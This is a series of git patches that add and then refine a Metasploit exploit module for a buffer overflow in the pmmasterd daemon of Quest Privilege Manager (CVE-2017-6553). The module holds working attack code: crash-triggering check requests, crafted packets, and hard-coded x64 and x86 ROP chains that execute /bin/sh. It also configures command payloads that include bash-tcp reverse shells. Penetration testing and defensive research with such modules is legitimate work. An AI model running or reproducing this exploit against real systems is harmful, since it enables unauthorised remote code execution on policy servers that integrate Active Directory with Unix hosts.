From 9a0789f839b7d1a7245dd29c48e457bd257e963f Mon Sep 17 00:00:00 2001 From: m0t Date: Wed, 5 Apr 2017 17:59:54 +0100 Subject: [PATCH 1/5] Exploit for pmmasterd Buffer Overflow (CVE-2017-6553) --- .../linux/misc/quest_pmmasterd_bof.rb | 202 ++++++++++++++++++ 1 file changed, 202 insertions(+) create mode 100644 modules/exploits/linux/misc/quest_pmmasterd_bof.rb diff --git a/modules/exploits/linux/misc/quest_pmmasterd_bof.rb b/modules/exploits/linux/misc/quest_pmmasterd_bof.rb new file mode 100644 index 0000000000..4a10111a35 --- /dev/null +++ b/modules/exploits/linux/misc/quest_pmmasterd_bof.rb @@ -0,0 +1,202 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' + +class MetasploitModule < Msf::Exploit::Remote + Rank = NormalRanking + + include Exploit::Remote::Tcp + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Quest Privilege Manager pmmasterd Buffer Overflow', + 'Description' => %q{ + This modules exploits a buffer overflow in the Quest Privilege Manager, + a software used to integrate Active Directory with Linux and Unix systems. + The vulnerability exists in the pmmasterd daemon, and can only triggered when + the host has been configured as a policy server ( Privilege Manager for Unix + or Quest Sudo Plugin). A buffer overflow condition exists when handling + requests of type ACT_ALERT_EVENT, where the size of a memcpy can be + controlled by the attacker. This module only works against version < 6.0.0-27. + Versions up to 6.0.0-50 are also vulnerable, but not supported by this module (stack cookies bypass is required). + }, + 'Author' => + [ + 'm0t' + ], + 'References' => + [ + ['CVE', '2017-6553'] + ], + 'Payload' => + { + 'BadChars' => "", + 'Compat' => + { + 'PayloadType' => 'cmd', + 'RequiredCmd' => 'generic python perl ruby openssl bash-tcp' + } + }, + 'Arch' => ARCH_CMD, + 'Platform' => 'unix', + 'Targets' => + [ + ['Quest Privilege Manager pmmasterd 6.0.0-27 x64', + { + :exploit => :exploit_x64, + :check => :check_x64 + } + ], + ['Quest Privilege Manager pmmasterd 6.0.0-27 x86', + { + :exploit => :exploit_x86, + :check => :check_x86 + } + ] + ], + 'Privileged' => false, #XXX + 'DisclosureDate' => 'Apr 09 2017', + 'DefaultTarget' => 1 + )) + + register_options([ Opt::RPORT(12345) ], self.class) + register_options( [ Opt::CPORT(rand(1024))], self.class ) + end + + #definitely not stealthy! sends a crashing request, if the socket dies, or the output is partial it assumes the target has crashed. Although the daemon spawns a new process for each connection, the segfault will appear on syslog + def check + unless self.respond_to?(target[:check], true) + fail_with(Failure::NoTarget, "Invalid target specified") + end + + return self.send(target[:check]) + end + + def exploit + unless self.respond_to?(target[:exploit], true) + fail_with(Failure::NoTarget, "Invalid target specified") + end + + request = self.send(target[:exploit]) + + connect + print_status("Sending trigger") + sock.put(request) + sock.get_once + print_status("Sending payload") + sock.put(payload.encoded) + disconnect + end + + #server should crash after parsing the packet, partial output is returned + def check_x64 + head = [ 0x26c ].pack("N") + head << [ 0x700 ].pack("N") + head << [ 0x700 ].pack("N") + head << "\x00"*68 + + body = "PingE4.6 .0.0.27" + body << rand_text_alpha(3000) + + request = head + body + + connect + print_status("Sending trigger") + sock.put(request) + res = sock.timed_read(1024, 1) + if res.match("Pong4$") + return Exploit::CheckCode::Appears + else + return Exploit::CheckCode::Unknown + end + end + + #server should crash while parsing the packet, with no output + def check_x86 + head = [ 0x26c ].pack("N") + head << [ 0x700 ].pack("N") + head << [ 0x700 ].pack("N") + head << "\x00"*68 + + body = rand_text_alpha(3000) + + request = head + body + + connect + print_status("Sending trigger") + sock.put(request) + begin + res = sock.timed_read(1024, 1) + return Exploit::CheckCode::Unknown + rescue ::Exception + return Exploit::CheckCode::Appears + end + end + + def exploit_x64 + head = [ 0x26c ].pack("N") + head << [ 0x700 ].pack("N") + head << [ 0x700 ].pack("N") + head << "\x00"*68 + + #rop chain for pmmasterd 6.0.0.27 (which is compiled without -fPIE) + ropchain = [ + 0x408f88, # pop rdi, ret + 0x4FA215, # /bin/sh + 0x40a99e, # pop rsi ; ret + 0, # argv @rsi + 0x40c1a0, # pop rax, ret + 0, # envp @rax + 0x48c751, # mov rdx, rax ; pop rbx ; mov rax, rdx ; ret + 0xcacc013, # padd + 0x408a98, # execve, + 0 + ].pack("Q*") + + body = "PingE4.6 .0.0.27" # this works if encryption is set to AES, which is default, changing E4 to E2 might make it work with DES + body << rand_text_alpha(1600) + body << ropchain + body << rand_text_alpha(0x700 - body.size()) + + return head + body + + end + + def exploit_x86 + head = [ 0x26c ].pack("N") + head << [ 0x108 ].pack("N") + head << [ 0xcc ].pack("N") + head << "\x00"*68 + + #rop chain for pmmasterd 6.0.0.27 (which is compiled without -fPIE) + ropchain = [ + 0x8093262, # ret + 0x73, # cs reg + 0x804AE2C, # execve, + 0xcacc013, # padding + 0x8136CF0, # /bin/sh + 0, + 0 + ].pack("V*") + + pivotback = 0x08141223 # sub esp, ebx ; retf + writable = 0x81766f8 # writable loc + + body = "PingE4.6 .0.0.27" # this works if encryption is set to AES, which is default, changing E4 to E2 might make it work with DES + body << rand_text_alpha(104) + body << ropchain + body << rand_text_alpha(0xb4 - body.size()) + body << [0x50].pack("V") + body << rand_text_alpha(0xc4 - body.size()) + body << [pivotback].pack("V") + body << [writable].pack("V") + body << rand_text_alpha(0x108 - body.size()) + + return head + body + end + +end + From 374d7809b574d285f0bd1dced3d35fe584cea229 Mon Sep 17 00:00:00 2001 From: m0t Date: Tue, 11 Apr 2017 09:48:57 +0100 Subject: [PATCH 2/5] last fixes and tests --- modules/exploits/linux/misc/quest_pmmasterd_bof.rb | 7 ++++--- 1 file changed, 4 insertions(+), 3 deletions(-) diff --git a/modules/exploits/linux/misc/quest_pmmasterd_bof.rb b/modules/exploits/linux/misc/quest_pmmasterd_bof.rb index 4a10111a35..b1490bd6af 100644 --- a/modules/exploits/linux/misc/quest_pmmasterd_bof.rb +++ b/modules/exploits/linux/misc/quest_pmmasterd_bof.rb @@ -21,7 +21,7 @@ class MetasploitModule < Msf::Exploit::Remote or Quest Sudo Plugin). A buffer overflow condition exists when handling requests of type ACT_ALERT_EVENT, where the size of a memcpy can be controlled by the attacker. This module only works against version < 6.0.0-27. - Versions up to 6.0.0-50 are also vulnerable, but not supported by this module (stack cookies bypass is required). + Versions up to 6.0.0-50 are also vulnerable, but not supported by this module (a stack cookie bypass is required). }, 'Author' => [ @@ -29,7 +29,8 @@ class MetasploitModule < Msf::Exploit::Remote ], 'References' => [ - ['CVE', '2017-6553'] + ['CVE', '2017-6553'], + ['URL' , 'https://0xdeadface.wordpress.com/2017/04/07/multiple-vulnerabilities-in-quest-privilege-manager-6-0-0-xx-cve-2017-6553-cve-2017-6554/'] ], 'Payload' => { @@ -57,7 +58,7 @@ class MetasploitModule < Msf::Exploit::Remote } ] ], - 'Privileged' => false, #XXX + 'Privileged' => true, 'DisclosureDate' => 'Apr 09 2017', 'DefaultTarget' => 1 )) From 5e42dde6b62fd1487539c1c822bba7ebfcd15c50 Mon Sep 17 00:00:00 2001 From: m0t Date: Wed, 12 Apr 2017 16:25:21 +0100 Subject: [PATCH 3/5] msftidy clean up --- modules/exploits/linux/misc/quest_pmmasterd_bof.rb | 12 ++++++------ 1 file changed, 6 insertions(+), 6 deletions(-) diff --git a/modules/exploits/linux/misc/quest_pmmasterd_bof.rb b/modules/exploits/linux/misc/quest_pmmasterd_bof.rb index b1490bd6af..b4f0db4c3a 100644 --- a/modules/exploits/linux/misc/quest_pmmasterd_bof.rb +++ b/modules/exploits/linux/misc/quest_pmmasterd_bof.rb @@ -17,7 +17,7 @@ class MetasploitModule < Msf::Exploit::Remote This modules exploits a buffer overflow in the Quest Privilege Manager, a software used to integrate Active Directory with Linux and Unix systems. The vulnerability exists in the pmmasterd daemon, and can only triggered when - the host has been configured as a policy server ( Privilege Manager for Unix + the host has been configured as a policy server ( Privilege Manager for Unix or Quest Sudo Plugin). A buffer overflow condition exists when handling requests of type ACT_ALERT_EVENT, where the size of a memcpy can be controlled by the attacker. This module only works against version < 6.0.0-27. @@ -43,7 +43,7 @@ class MetasploitModule < Msf::Exploit::Remote }, 'Arch' => ARCH_CMD, 'Platform' => 'unix', - 'Targets' => + 'Targets' => [ ['Quest Privilege Manager pmmasterd 6.0.0-27 x64', { @@ -67,12 +67,12 @@ class MetasploitModule < Msf::Exploit::Remote register_options( [ Opt::CPORT(rand(1024))], self.class ) end - #definitely not stealthy! sends a crashing request, if the socket dies, or the output is partial it assumes the target has crashed. Although the daemon spawns a new process for each connection, the segfault will appear on syslog + #definitely not stealthy! sends a crashing request, if the socket dies, or the output is partial it assumes the target has crashed. Although the daemon spawns a new process for each connection, the segfault will appear on syslog def check unless self.respond_to?(target[:check], true) fail_with(Failure::NoTarget, "Invalid target specified") end - + return self.send(target[:check]) end @@ -149,10 +149,10 @@ class MetasploitModule < Msf::Exploit::Remote 0x4FA215, # /bin/sh 0x40a99e, # pop rsi ; ret 0, # argv @rsi - 0x40c1a0, # pop rax, ret + 0x40c1a0, # pop rax, ret 0, # envp @rax 0x48c751, # mov rdx, rax ; pop rbx ; mov rax, rdx ; ret - 0xcacc013, # padd + 0xcacc013, # padding 0x408a98, # execve, 0 ].pack("Q*") From 4f12a1e271cd614497a32e666d976672703019af Mon Sep 17 00:00:00 2001 From: m0t Date: Sun, 7 May 2017 13:54:28 +0100 Subject: [PATCH 4/5] added note to description --- modules/exploits/linux/misc/quest_pmmasterd_bof.rb | 1 + 1 file changed, 1 insertion(+) diff --git a/modules/exploits/linux/misc/quest_pmmasterd_bof.rb b/modules/exploits/linux/misc/quest_pmmasterd_bof.rb index b4f0db4c3a..761e7a023f 100644 --- a/modules/exploits/linux/misc/quest_pmmasterd_bof.rb +++ b/modules/exploits/linux/misc/quest_pmmasterd_bof.rb @@ -22,6 +22,7 @@ class MetasploitModule < Msf::Exploit::Remote requests of type ACT_ALERT_EVENT, where the size of a memcpy can be controlled by the attacker. This module only works against version < 6.0.0-27. Versions up to 6.0.0-50 are also vulnerable, but not supported by this module (a stack cookie bypass is required). + NOTE: To use this module it is required to be able to bind a privileged port ( <=1024 ) as the server refuses connections coming from unprivileged ports, which in most situations means that root privileges are required. }, 'Author' => [ From ab245b50422dcb25f933fe7db6fd49e85959aa49 Mon Sep 17 00:00:00 2001 From: m0t Date: Sun, 7 May 2017 13:56:50 +0100 Subject: [PATCH 5/5] added note to description --- modules/exploits/linux/misc/quest_pmmasterd_bof.rb | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/modules/exploits/linux/misc/quest_pmmasterd_bof.rb b/modules/exploits/linux/misc/quest_pmmasterd_bof.rb index 761e7a023f..8bb3e9af6c 100644 --- a/modules/exploits/linux/misc/quest_pmmasterd_bof.rb +++ b/modules/exploits/linux/misc/quest_pmmasterd_bof.rb @@ -22,7 +22,9 @@ class MetasploitModule < Msf::Exploit::Remote requests of type ACT_ALERT_EVENT, where the size of a memcpy can be controlled by the attacker. This module only works against version < 6.0.0-27. Versions up to 6.0.0-50 are also vulnerable, but not supported by this module (a stack cookie bypass is required). - NOTE: To use this module it is required to be able to bind a privileged port ( <=1024 ) as the server refuses connections coming from unprivileged ports, which in most situations means that root privileges are required. + NOTE: To use this module it is required to be able to bind a privileged port ( <=1024 ) + as the server refuses connections coming from unprivileged ports, which in most situations + means that root privileges are required. }, 'Author' => [